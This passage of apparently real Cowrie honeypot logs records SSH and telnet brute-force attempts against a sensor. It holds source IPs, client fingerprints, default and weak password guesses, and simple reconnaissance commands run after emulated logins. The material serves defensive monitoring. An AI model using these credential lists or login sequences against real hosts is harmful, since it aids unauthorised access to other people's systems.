0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:12:33.511135Z","src_ip":"212.227.125.160","session":"1db993539619"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:12:38.666795Z","src_ip":"212.227.125.160","session":"1db993539619"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:12:41.509214Z","src_ip":"212.227.125.160","session":"1db993539619"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T21:12:41.510056Z","src_ip":"212.227.125.160","session":"1db993539619"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:12:42.783999Z","src_ip":"212.227.125.160","session":"1db993539619"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:12:42.785061Z","src_ip":"212.227.125.160","session":"1db993539619"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":51590,"dst_ip":"1.2.3.4","dst_port":22,"session":"0af92edea8fc","protocol":"ssh","message":"New connection: 201.148.180.50:51590 (1.2.3.4:22) [session: 0af92edea8fc]","sensor":"my-vps","timestamp":"2025-08-28T21:12:50.932409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:12:52.346356Z","src_ip":"201.148.180.50","session":"0af92edea8fc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:12:52.347246Z","src_ip":"201.148.180.50","session":"0af92edea8fc"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:12:59.358223Z","src_ip":"201.148.180.50","session":"0af92edea8fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:13:02.521359Z","src_ip":"201.148.180.50","session":"0af92edea8fc"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-28T21:13:02.522172Z","src_ip":"201.148.180.50","session":"0af92edea8fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:13:04.463532Z","src_ip":"201.148.180.50","session":"0af92edea8fc"}
{"eventid":"cowrie.session.closed","duration":"13.6","message":"Connection lost after 13.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:13:04.537700Z","src_ip":"201.148.180.50","session":"0af92edea8fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37522,"dst_ip":"1.2.3.4","dst_port":23,"session":"33d9081fb338","protocol":"telnet","message":"New connection: 212.227.235.229:37522 (1.2.3.4:23) [session: 33d9081fb338]","sensor":"my-vps","timestamp":"2025-08-28T21:14:02.403464Z"}
{"eventid":"cowrie.session.closed","duration":12.982049226760864,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:14:15.385449Z","src_ip":"212.227.235.229","session":"33d9081fb338"}
{"eventid":"cowrie.session.connect","src_ip":"210.123.224.151","src_port":36013,"dst_ip":"1.2.3.4","dst_port":23,"session":"9aad969ec4a0","protocol":"telnet","message":"New connection: 210.123.224.151:36013 (1.2.3.4:23) [session: 9aad969ec4a0]","sensor":"my-vps","timestamp":"2025-08-28T21:14:18.780420Z"}
{"eventid":"cowrie.session.closed","duration":31.140080451965332,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:14:49.920429Z","src_ip":"210.123.224.151","session":"9aad969ec4a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43587,"dst_ip":"1.2.3.4","dst_port":22,"session":"844dd0633680","protocol":"ssh","message":"New connection: 212.227.235.229:43587 (1.2.3.4:22) [session: 844dd0633680]","sensor":"my-vps","timestamp":"2025-08-28T21:15:43.516215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:15:43.520003Z","src_ip":"212.227.235.229","session":"844dd0633680"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:15:43.648813Z","src_ip":"212.227.235.229","session":"844dd0633680"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"7777777","message":"login attempt [joyce/7777777] failed","sensor":"my-vps","timestamp":"2025-08-28T21:15:44.211941Z","src_ip":"212.227.235.229","session":"844dd0633680"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abc123","message":"login attempt [joyce/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T21:15:45.343355Z","src_ip":"212.227.235.229","session":"844dd0633680"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abcd123","message":"login attempt [joyce/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T21:15:46.501020Z","src_ip":"212.227.235.229","session":"844dd0633680"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abcd1234","message":"login attempt [joyce/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:15:47.648149Z","src_ip":"212.227.235.229","session":"844dd0633680"}
{"eventid":"cowrie.login.failed","username":"joyce","password":"abc1234","message":"login attempt [joyce/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:15:48.788733Z","src_ip":"212.227.235.229","session":"844dd0633680"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:15:49.920461Z","src_ip":"212.227.235.229","session":"844dd0633680"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62072,"dst_ip":"1.2.3.4","dst_port":22,"session":"de1f741db7cc","protocol":"ssh","message":"New connection: 217.72.205.35:62072 (1.2.3.4:22) [session: de1f741db7cc]","sensor":"my-vps","timestamp":"2025-08-28T21:15:54.967349Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:15:54.968461Z","src_ip":"217.72.205.35","session":"de1f741db7cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49930,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f5e46ff0649","protocol":"ssh","message":"New connection: 212.227.235.229:49930 (1.2.3.4:22) [session: 0f5e46ff0649]","sensor":"my-vps","timestamp":"2025-08-28T21:17:28.979390Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:17:29.141969Z","src_ip":"212.227.235.229","session":"0f5e46ff0649"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49938,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e3310e50b2e","protocol":"ssh","message":"New connection: 212.227.235.229:49938 (1.2.3.4:22) [session: 8e3310e50b2e]","sensor":"my-vps","timestamp":"2025-08-28T21:17:30.334892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:17:30.335880Z","src_ip":"212.227.235.229","session":"8e3310e50b2e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:17:30.503969Z","src_ip":"212.227.235.229","session":"8e3310e50b2e"}
{"eventid":"cowrie.login.failed","username":"karina","password":"karina","message":"login attempt [karina/karina] failed","sensor":"my-vps","timestamp":"2025-08-28T21:17:32.005640Z","src_ip":"212.227.235.229","session":"8e3310e50b2e"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:17:33.183590Z","src_ip":"212.227.235.229","session":"8e3310e50b2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51768,"dst_ip":"1.2.3.4","dst_port":22,"session":"033e65b6f61c","protocol":"ssh","message":"New connection: 212.227.235.229:51768 (1.2.3.4:22) [session: 033e65b6f61c]","sensor":"my-vps","timestamp":"2025-08-28T21:17:36.595225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:17:36.777113Z","src_ip":"212.227.235.229","session":"033e65b6f61c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T21:17:36.777808Z","src_ip":"212.227.235.229","session":"033e65b6f61c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pfsense","message":"login attempt [admin/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T21:17:37.736425Z","src_ip":"212.227.235.229","session":"033e65b6f61c"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":8608,"dst_ip":"1.2.3.4","dst_port":22,"session":"4041bf46a2db","protocol":"ssh","message":"New connection: 80.94.95.112:8608 (1.2.3.4:22) [session: 4041bf46a2db]","sensor":"my-vps","timestamp":"2025-08-28T21:17:38.978477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:17:38.979477Z","src_ip":"80.94.95.112","session":"4041bf46a2db"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:17:39.010504Z","src_ip":"80.94.95.112","session":"4041bf46a2db"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:17:39.050564Z","src_ip":"212.227.235.229","session":"033e65b6f61c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26051982","message":"login attempt [admin/26051982] failed","sensor":"my-vps","timestamp":"2025-08-28T21:17:39.210161Z","src_ip":"80.94.95.112","session":"4041bf46a2db"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26031981","message":"login attempt [admin/26031981] failed","sensor":"my-vps","timestamp":"2025-08-28T21:17:40.242596Z","src_ip":"80.94.95.112","session":"4041bf46a2db"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25111979","message":"login attempt [admin/25111979] failed","sensor":"my-vps","timestamp":"2025-08-28T21:17:41.275356Z","src_ip":"80.94.95.112","session":"4041bf46a2db"}
{"eventid":"cowrie.login.failed","username":"admin","password":"251086","message":"login attempt [admin/251086] failed","sensor":"my-vps","timestamp":"2025-08-28T21:17:42.307842Z","src_ip":"80.94.95.112","session":"4041bf46a2db"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25101992","message":"login attempt [admin/25101992] failed","sensor":"my-vps","timestamp":"2025-08-28T21:17:43.341130Z","src_ip":"80.94.95.112","session":"4041bf46a2db"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:17:44.373209Z","src_ip":"80.94.95.112","session":"4041bf46a2db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50804,"dst_ip":"1.2.3.4","dst_port":22,"session":"f32e8d24f97d","protocol":"ssh","message":"New connection: 212.227.125.160:50804 (1.2.3.4:22) [session: f32e8d24f97d]","sensor":"my-vps","timestamp":"2025-08-28T21:18:46.367296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:18:47.535877Z","src_ip":"212.227.125.160","session":"f32e8d24f97d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:18:47.536633Z","src_ip":"212.227.125.160","session":"f32e8d24f97d"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@2018$","message":"login attempt [root/admin@2018$] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:18:55.259837Z","src_ip":"212.227.125.160","session":"f32e8d24f97d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:18:58.026291Z","src_ip":"212.227.125.160","session":"f32e8d24f97d"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-28T21:18:58.027067Z","src_ip":"212.227.125.160","session":"f32e8d24f97d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:18:59.801913Z","src_ip":"212.227.125.160","session":"f32e8d24f97d"}
{"eventid":"cowrie.session.closed","duration":"13.4","message":"Connection lost after 13.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:18:59.803009Z","src_ip":"212.227.125.160","session":"f32e8d24f97d"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":58048,"dst_ip":"1.2.3.4","dst_port":22,"session":"5053f6e103c7","protocol":"ssh","message":"New connection: 201.148.180.50:58048 (1.2.3.4:22) [session: 5053f6e103c7]","sensor":"my-vps","timestamp":"2025-08-28T21:19:05.775258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:19:07.213798Z","src_ip":"201.148.180.50","session":"5053f6e103c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:19:07.214737Z","src_ip":"201.148.180.50","session":"5053f6e103c7"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@2018$","message":"login attempt [root/admin@2018$] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:19:14.551834Z","src_ip":"201.148.180.50","session":"5053f6e103c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:19:18.268659Z","src_ip":"201.148.180.50","session":"5053f6e103c7"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T21:19:18.269388Z","src_ip":"201.148.180.50","session":"5053f6e103c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"2.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:19:20.424857Z","src_ip":"201.148.180.50","session":"5053f6e103c7"}
{"eventid":"cowrie.session.closed","duration":"14.7","message":"Connection lost after 14.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:19:20.480996Z","src_ip":"201.148.180.50","session":"5053f6e103c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59576,"dst_ip":"1.2.3.4","dst_port":23,"session":"d2a3f13a6fca","protocol":"telnet","message":"New connection: 212.227.125.160:59576 (1.2.3.4:23) [session: d2a3f13a6fca]","sensor":"my-vps","timestamp":"2025-08-28T21:19:28.998977Z"}
{"eventid":"cowrie.session.closed","duration":10.132322549819946,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:19:39.131230Z","src_ip":"212.227.125.160","session":"d2a3f13a6fca"}
